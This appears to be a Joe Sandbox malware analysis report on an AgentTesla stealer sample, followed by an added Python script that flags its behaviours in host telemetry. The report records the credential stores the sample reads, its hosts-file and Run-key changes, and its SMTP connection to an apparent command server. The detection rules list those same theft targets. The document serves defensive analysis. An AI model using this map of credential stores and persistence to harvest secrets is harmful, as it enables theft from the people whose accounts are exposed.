Source: C:\Users\user\Desktop\SlipMT103.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\SlipMT103.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\Desktop\SlipMT103.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\Desktop\SlipMT103.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\Desktop\SlipMT103.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\SlipMT103.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\SlipMT103.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Queries volume information: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Linq.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Queries volume information: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Queries volume information: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe VolumeInformation
Source: C:\Users\user\Desktop\SlipMT103.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Modifies the hosts file
Source: C:\Users\user\Desktop\SlipMT103.exe | File written: C:\Windows\System32\drivers\etc\hosts

Stealing of Sensitive Information:

Yara detected AgentTesla
Source: Yara match | File source: 0.2.SlipMT103.exe.3c27038.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.kprUEGC.exe.44a0e18.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.0.kprUEGC.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.0.kprUEGC.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.kprUEGC.exe.44d7038.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.0.kprUEGC.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.SlipMT103.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.SlipMT103.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.SlipMT103.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.0.kprUEGC.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.SlipMT103.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.SlipMT103.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SlipMT103.exe.3bf0e18.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.kprUEGC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.kprUEGC.exe.44d7038.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.0.kprUEGC.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.SlipMT103.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.kprUEGC.exe.44a0e18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SlipMT103.exe.3c27038.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SlipMT103.exe.3bf0e18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000000.358186685.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000000.446727696.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.618566079.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.356758159.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000000.448106925.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.357240049.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.361078154.0000000003AFD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000000.444571373.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000000.445138730.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.356357042.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.452252607.00000000043AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.618546688.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.624222923.00000000029E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.626792715.00000000027A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SlipMT103.exe PID: 6388, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SlipMT103.exe PID: 6456, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: kprUEGC.exe PID: 2900, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: kprUEGC.exe PID: 988, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\SlipMT103.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\SlipMT103.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\SlipMT103.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\SlipMT103.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\SlipMT103.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\SlipMT103.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\SlipMT103.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\

Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\SlipMT103.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\SlipMT103.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: Yara match | File source: 0000000C.00000002.624222923.00000000029E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.626792715.00000000027A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SlipMT103.exe PID: 6456, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: kprUEGC.exe PID: 988, type: MEMORYSTR

Remote Access Functionality:

Yara detected AgentTesla
Source: Yara match | File source: 0.2.SlipMT103.exe.3c27038.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.kprUEGC.exe.44a0e18.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.0.kprUEGC.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.0.kprUEGC.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.kprUEGC.exe.44d7038.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.0.kprUEGC.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.SlipMT103.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.SlipMT103.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.SlipMT103.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.0.kprUEGC.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.SlipMT103.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.SlipMT103.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SlipMT103.exe.3bf0e18.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.kprUEGC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.kprUEGC.exe.44d7038.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.0.kprUEGC.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.SlipMT103.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.kprUEGC.exe.44a0e18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SlipMT103.exe.3c27038.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SlipMT103.exe.3bf0e18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000000.358186685.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000000.446727696.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.618566079.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.356758159.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000000.448106925.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.357240049.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.361078154.0000000003AFD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000000.444571373.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000000.445138730.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.356357042.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.452252607.00000000043AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.618546688.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.624222923.00000000029E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.626792715.00000000027A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SlipMT103.exe PID: 6388, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SlipMT103.exe PID: 6456, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: kprUEGC.exe PID: 2900, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: kprUEGC.exe PID: 988, type: MEMORYSTR
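The behaviours recorded under Lowering of HIPS / PFW / Operating System Security Settings and Stealing of Sensitive Information above, together with the Run-key autostart and the SMTP connection to mail.aquanova.es recorded elsewhere in this report, can be turned into host-triage logic. The Python below is an added example written for this page; it is not part of the Joe Sandbox report and not AgentTesla's own code. It scans constructed EDR-style event records (an assumed, simplified shape defined by the Event class; the owner-process name for each credential store is likewise an assumption) and flags the report's indicators. It deliberately generalizes two of them beyond this sample: any Run value that points into %APPDATA%, and any SMTP-submission connection made by a binary running out of a user profile, not only the value name and mail host seen here.

```python
"""Offline triage of host telemetry against the indicators in this report.

Added example, not part of the Joe Sandbox report and not AgentTesla code. It
scans EDR-style event records (an assumed, simplified shape; see Event) for the
behaviours attributed to SlipMT103.exe / kprUEGC.exe and generalizes two of
them: any Run value pointing into %APPDATA%, and SMTP submission from a binary
running out of a user profile.
"""
import re
from dataclasses import dataclass
from typing import Iterable, Optional

# Indicators copied from the report.
C2_HOST, C2_IP = "mail.aquanova.es", "51.83.52.225"
SMTP_PORTS = {25, 465, 587}  # 587 is the port seen in the report
HOSTS_FILE = "c:\\windows\\system32\\drivers\\etc\\hosts"
USER_PROFILE_ROOT, APPDATA_FRAGMENT = "c:\\users\\", "\\appdata\\roaming\\"
RUN_KEY_RE = re.compile(
    r"^HK(CU|CU64|EY_CURRENT_USER)\\Software\\Microsoft\\Windows\\CurrentVersion"
    r"\\Run\\(?P<name>[^\\]+)$", re.IGNORECASE)
# Credential stores the report shows being opened, mapped to the process that
# legitimately reads each one (the owner executable names are assumptions).
OWNER_OF = {
    "\\thunderbird\\profiles.ini": "thunderbird.exe",
    "\\filezilla\\recentservers.xml": "filezilla.exe",
    "\\smartftp\\client 2.0\\favorites\\quick connect": "smartftp.exe",
    "\\google\\chrome\\user data\\default\\login data": "chrome.exe",
    "\\mozilla\\firefox\\profiles.ini": "firefox.exe",
    "software\\martin prikryl\\winscp 2\\sessions": "winscp.exe",
    "software\\incredimail\\identities": "incmail.exe",
    "windows messaging subsystem\\profiles\\outlook\\9375cff0413111d3b88a00104b2a6676": "outlook.exe",
}


@dataclass(frozen=True)
class Event:
    kind: str                 # reg_set | reg_open | file_write | file_open | net_connect
    image: str                # full path of the acting process
    target: str = ""          # registry key/value path or file path
    data: str = ""            # registry value data (reg_set only)
    dest_host: Optional[str] = None
    dest_ip: Optional[str] = None
    dest_port: Optional[int] = None


@dataclass(frozen=True)
class Finding:
    rule: str
    image: str
    detail: str


def triage(events: Iterable[Event]) -> list[Finding]:
    """Apply the report-derived rules to normalized events; returns every hit."""
    out: list[Finding] = []
    for ev in events:
        target, image = ev.target.lower(), ev.image.lower()
        if ev.kind == "reg_set":
            m = RUN_KEY_RE.match(ev.target)
            if m and APPDATA_FRAGMENT in ev.data.lower():
                out.append(Finding("run_key_into_appdata", ev.image, f"{m['name']} -> {ev.data}"))
        elif ev.kind == "file_write" and target == HOSTS_FILE:
            # Every writer is reported (an admin editing hosts matches too); the
            # image is part of the finding so the analyst can judge it.
            out.append(Finding("hosts_file_modified", ev.image, ev.target))
        elif ev.kind in ("file_open", "reg_open"):
            for fragment, owner in OWNER_OF.items():
                if fragment in target and image.rsplit("\\", 1)[-1] != owner:
                    out.append(Finding("credential_store_access", ev.image, ev.target))
                    break
        elif ev.kind == "net_connect":
            where = f"{ev.dest_host} {ev.dest_ip}:{ev.dest_port}"
            if ev.dest_ip == C2_IP or (ev.dest_host or "").lower() == C2_HOST:
                out.append(Finding("known_smtp_c2", ev.image, where))
            elif ev.dest_port in SMTP_PORTS and image.startswith(USER_PROFILE_ROOT):
                out.append(Finding("smtp_from_user_profile_binary", ev.image, where))
    return out


SAMPLE_EVENTS = [  # constructed telemetry mirroring the report, not captured data
    Event("reg_set", r"C:\Users\user\Desktop\SlipMT103.exe",
          r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\kprUEGC",
          data=r"C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe"),
    Event("file_write", r"C:\Users\user\Desktop\SlipMT103.exe", r"C:\Windows\System32\drivers\etc\hosts"),
    Event("file_open", r"C:\Users\user\Desktop\SlipMT103.exe",
          r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"),
    Event("reg_open", r"C:\Users\user\Desktop\SlipMT103.exe",
          r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"),
    Event("net_connect", r"C:\Users\user\Desktop\SlipMT103.exe",
          dest_host="mail.aquanova.es", dest_ip="51.83.52.225", dest_port=587),
    # Benign controls: an owner app reading its own store; a mail client submitting mail.
    Event("file_open", r"C:\Program Files\Mozilla Firefox\firefox.exe",
          r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"),
    Event("net_connect", r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
          dest_host="smtp.example.net", dest_ip="203.0.113.10", dest_port=587),
    # Unknown user-profile binary using SMTP submission: caught by the generalized rule.
    Event("net_connect", r"C:\Users\user\AppData\Local\Temp\update.exe",
          dest_host="smtp.example.org", dest_ip="198.51.100.7", dest_port=587),
]


def run_sample() -> list[Finding]:
    return triage(SAMPLE_EVENTS)


if __name__ == "__main__":
    for f in run_sample():
        print(f"{f.rule:30} {f.image}  {f.detail}")
```

Run the file directly to print the six findings the constructed sample produces, or pass your own normalized events to triage() to reuse the rules. The two benign control events (Firefox reading its own profiles.ini, Outlook submitting mail from Program Files) produce no finding; that boundary is exactly what the owner map and the user-profile check are there to draw, since the report's stealer behaviour is defined by who opens the store and from where, not by the store path alone.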

Mitre Att&ck Matrix

Techniques flagged for this sample, grouped by tactic. Bracketed figures are the per-technique signature-count badges as rendered in the report, concatenated by extraction. Tactics with no flagged technique (Initial Access, Lateral Movement, Exfiltration, Network Effects, Remote Service Effects, Impact) are not listed; the remaining cells of the original table are the unpopulated ATT&CK template.

• Execution: Windows Management Instrumentation [211]; Command and Scripting Interpreter [2]
• Persistence: Registry Run Keys / Startup Folder [1]
• Privilege Escalation: Process Injection [12]; Registry Run Keys / Startup Folder [1]
• Defense Evasion: File and Directory Permissions Modification [1]; Disable or Modify Tools [1]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [2]; Software Packing [13]; Masquerading [1]; Virtualization/Sandbox Evasion [131]; Process Injection [12]; Hidden Files and Directories [1]
• Credential Access: OS Credential Dumping [2]; Input Capture [1]; Credentials in Registry [1]
• Discovery: System Information Discovery [114]; Query Registry [1]; Security Software Discovery [311]; Process Discovery [2]; Virtualization/Sandbox Evasion [131]; Application Window Discovery [1]; Remote System Discovery [1]
• Collection: Archive Collected Data [11]; Data from Local System [2]; Email Collection [1]; Input Capture [1]
• Command and Control: Encrypted Channel [1]; Non-Standard Port [1]; Non-Application Layer Protocol [1]; Application Layer Protocol [11]

Behavior Graph

Behavior Graph ID: 528729 | Sample: SlipMT103.exe | Start date: 25/11/2021 | Architecture: WINDOWS | Score: 100

Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Multi AV Scanner detection for submitted file; 5 other signatures

Process tree reconstructed from the graph:

• SlipMT103.exe (started)
    • dropped: C:\Users\user\AppData\...\SlipMT103.exe.log (ASCII)
    • signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
    • SlipMT103.exe (child, started)
        • network: mail.aquanova.es, 51.83.52.225, ports 49830, 587, OVHFR, France
        • dropped: C:\Users\user\AppData\Roaming\...\kprUEGC.exe (PE32); C:\Windows\System32\drivers\etc\hosts (ASCII); C:\Users\user\...\kprUEGC.exe:Zone.Identifier (ASCII)
        • signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; 3 other signatures
• kprUEGC.exe (started)
    • signature: Multi AV Scanner detection for dropped file
    • kprUEGC.exe (child, started)
• kprUEGC.exe (started)


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
SlipMT103.exe | 40% | ReversingLabs | ByteCode-MSIL.Trojan.NanoBot

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | 40% | ReversingLabs | ByteCode-MSIL.Trojan.NanoBot

Unpacked PE Files

Source | Detection | Scanner | Label
1.0.SlipMT103.exe.400000.12.unpack | 100% | Avira | TR/Spy.Gen8
12.0.kprUEGC.exe.400000.12.unpack | 100% | Avira | TR/Spy.Gen8
12.0.kprUEGC.exe.400000.10.unpack | 100% | Avira | TR/Spy.Gen8
1.2.SlipMT103.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
1.0.SlipMT103.exe.400000.6.unpack | 100% | Avira | TR/Spy.Gen8
12.0.kprUEGC.exe.400000.4.unpack | 100% | Avira | TR/Spy.Gen8
1.0.SlipMT103.exe.400000.4.unpack | 100% | Avira | TR/Spy.Gen8
12.0.kprUEGC.exe.400000.6.unpack | 100% | Avira | TR/Spy.Gen8
1.0.SlipMT103.exe.400000.8.unpack | 100% | Avira | TR/Spy.Gen8
12.2.kprUEGC.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
12.0.kprUEGC.exe.400000.8.unpack | 100% | Avira | TR/Spy.Gen8
1.0.SlipMT103.exe.400000.10.unpack | 100% | Avira | TR/Spy.Gen8

                      Domains

                      No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
https://api.ipify.org%GETMozilla/5.0 | 0% | URL Reputation | safe
http://DynDns.comDynDNS | 0% | URL Reputation | safe
http://DrWvWz.com | 0% | Avira URL Cloud | safe
http://defaultcontainer/Views/MainWindow.xaml | 0% | Avira URL Cloud | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
http://mail.aquanova.es | 0% | Avira URL Cloud | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe
http://3jx9Nc9mcrIeyBPlhe.org | 0% | Avira URL Cloud | safe
http://foo/Views/MainWindow.xaml | 0% | Avira URL Cloud | safe
https://api.ipify.org%$ | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
mail.aquanova.es | 51.83.52.225 | true | true | (none) | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://127.0.0.1:HTTP/1.1 | SlipMT103.exe, 00000001.00000002.626792715.00000000027A1000.00000004.00000001.sdmp; kprUEGC.exe, 0000000C.00000002.624222923.00000000029E1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
https://api.ipify.org%GETMozilla/5.0 | kprUEGC.exe, 0000000C.00000002.624222923.00000000029E1000.00000004.00000001.sdmp | false | URL Reputation: safe | low
http://DynDns.comDynDNS | kprUEGC.exe, 0000000C.00000002.624222923.00000000029E1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://DrWvWz.com | kprUEGC.exe, 0000000C.00000002.624222923.00000000029E1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://defaultcontainer/Views/MainWindow.xaml | kprUEGC.exe, 0000000D.00000002.455081302.0000000002D71000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | SlipMT103.exe, 00000001.00000002.626792715.00000000027A1000.00000004.00000001.sdmp; kprUEGC.exe, 0000000C.00000002.624222923.00000000029E1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | SlipMT103.exe, 00000000.00000002.360382819.0000000002AF1000.00000004.00000001.sdmp; SlipMT103.exe, 00000000.00000002.360569240.0000000002BBA000.00000004.00000001.sdmp; kprUEGC.exe, 0000000A.00000002.451324743.000000000346B000.00000004.00000001.sdmp; kprUEGC.exe, 0000000A.00000002.451118533.00000000033A1000.00000004.00000001.sdmp | false | (none) | high
http://mail.aquanova.es | SlipMT103.exe, 00000001.00000002.628449891.0000000002AFF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | SlipMT103.exe, 00000000.00000002.361078154.0000000003AFD000.00000004.00000001.sdmp; SlipMT103.exe, 00000001.00000000.358186685.0000000000402000.00000040.00000001.sdmp; SlipMT103.exe, 00000001.00000000.356357042.0000000000402000.00000040.00000001.sdmp; kprUEGC.exe, 0000000A.00000002.452252607.00000000043AD000.00000004.00000001.sdmp; kprUEGC.exe, 0000000C.00000000.446727696.0000000000402000.00000040.00000001.sdmp; kprUEGC.exe, 0000000C.00000000.444571373.0000000000402000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown
http://3jx9Nc9mcrIeyBPlhe.org | SlipMT103.exe, 00000001.00000002.628274243.0000000002AAE000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://foo/Views/MainWindow.xaml | kprUEGC.exe, 0000000D.00000002.455081302.0000000002D71000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
https://api.ipify.org%$ | SlipMT103.exe, 00000001.00000002.626792715.00000000027A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
51.83.52.225 | mail.aquanova.es | France | 16276 | OVHFR | true

General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 528729
Start date: 25.11.2021
Start time: 18:01:43
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 54s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: SlipMT103.exe
Cookbook file name: default.jbs
